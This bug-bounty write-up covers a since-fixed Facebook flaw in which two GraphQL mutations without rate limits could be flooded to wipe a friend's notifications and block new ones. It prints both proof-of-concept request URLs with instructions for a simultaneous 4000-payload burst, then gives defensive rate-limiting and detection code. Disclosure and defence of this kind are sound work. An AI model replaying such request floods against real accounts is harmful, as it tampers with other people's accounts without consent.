[Facebook] Deleting Friends Notifications and preventing new Notifications

By exploiting missing rate limits on two GraphQL requests and performing the attack in a particular manner, it was possible to delete any friend's notifications and even prevent new ones from coming in.

Similar issue reported by me - click here

POC -

Rate Limit Evaluation -

Both of these requests could be sent with more than 4000 payloads, which took less than a minute.

There was no silent blocking: even after the 3000th payload, the victim was still hung and the response still reported success. The response length did not differ throughout the brute-force attack.

Both requests should be made simultaneously.

Request 1 -

https://developers.facebook.com/tools/explorer/?method=POST&path=graphql&version=v3.2&doc_id=2501557149952408&variables={"input":{"client_mutation_id":"10","actor_id":"XXX","participant_ids":["XXX"],"content_collection_id":"XXX","role":"CONTRIBUTOR","save_mechanism":"ADD_BUTTON","save_surface":"SAVE_LIST_COLLABORATORS_ADD_VIEW"},"scale":1,"useCase":"SAVE_DEFAULT"}

Request 2 -

https://developers.facebook.com/tools/explorer/?method=POST&path=graphql&version=v3.2&doc_id=3163221407084978&variables={"input":{"client_mutation_id":"11","actor_id":"XXX","content_collection_id":"2157516397876473","save_mechanism":"REMOVE_FROM_SAVED_LIST_BUTTON","participant_ids":["XXX"],"save_surface":"SAVE_LIST_COLLABORATORS_VIEW"},"scale":1,"useCase":"SAVE_DEFAULT"}
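The missing control described above is a per-actor limit on how often one mutation can be invoked. As an added example (not Facebook's code), the block below shows a sliding-window limit keyed by (actor_id, doc_id) that would reject the 4000-payload burst after the first few dozen calls, plus a log-side detector for an actor repeatedly adding and removing the same participant. The doc_ids and field names come from the write-up; the window, the limit of 60 per minute, and the churn threshold are assumed values.

```python
# Added example (not Facebook's code): a sliding-window limit per (actor, mutation)
# and a detector for add/remove churn against one participant. The doc_ids and
# field names come from the write-up; the thresholds are assumed values.
from collections import deque, defaultdict

ADD_COLLABORATOR_DOC_ID = "2501557149952408"  # Request 1 (role CONTRIBUTOR add)
REMOVE_FROM_LIST_DOC_ID = "3163221407084978"  # Request 2 (remove from saved list)
WINDOW_SECONDS = 60
MAX_PER_WINDOW = 60  # assumed: far below the 4000/minute the report achieved


class MutationRateLimiter:
    """Allow at most `limit` calls of a given doc_id per actor per window."""

    def __init__(self, window=WINDOW_SECONDS, limit=MAX_PER_WINDOW):
        self.window, self.limit = window, limit
        self._hits = defaultdict(deque)  # (actor_id, doc_id) -> timestamps

    def allow(self, actor_id, doc_id, now):
        q = self._hits[(actor_id, doc_id)]
        while q and now - q[0] >= self.window:  # expire old timestamps
            q.popleft()
        if len(q) >= self.limit:
            return False  # reject; caller should return an error, not success
        q.append(now)
        return True


def replay_burst(limiter, actor_id, doc_id, count, interval=0.01):
    """Send `count` mutations `interval` seconds apart; return (allowed, rejected)."""
    allowed = 0
    for i in range(count):
        allowed += limiter.allow(actor_id, doc_id, i * interval)
    return allowed, count - allowed


def flag_add_remove_churn(events, window=WINDOW_SECONDS, min_pairs=10):
    """Detection over mutation logs: events are (ts, actor_id, doc_id, participant_id).
    Flags (actor, participant) pairs with >= min_pairs add->remove cycles in a window."""
    pending_add, cycles = {}, defaultdict(int)
    for ts, actor, doc_id, participant in sorted(events):
        key = (actor, participant)
        if doc_id == ADD_COLLABORATOR_DOC_ID:
            pending_add[key] = ts
        elif doc_id == REMOVE_FROM_LIST_DOC_ID and key in pending_add:
            if ts - pending_add.pop(key) < window:
                cycles[key] += 1
    return {key for key, n in cycles.items() if n >= min_pairs}
```

Replaying the reported burst of 4000 payloads in under a minute through this limiter yields 60 accepted and 3940 rejected calls, and the rejected calls must surface as errors rather than the unchanged success responses the report observed.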

Timeline -

Reported - Friday, January 3, 2020

Triaged - Friday, January 17, 2020

Rewarded - Wednesday, February 19, 2020

Fixed - Tuesday, March 31, 2020
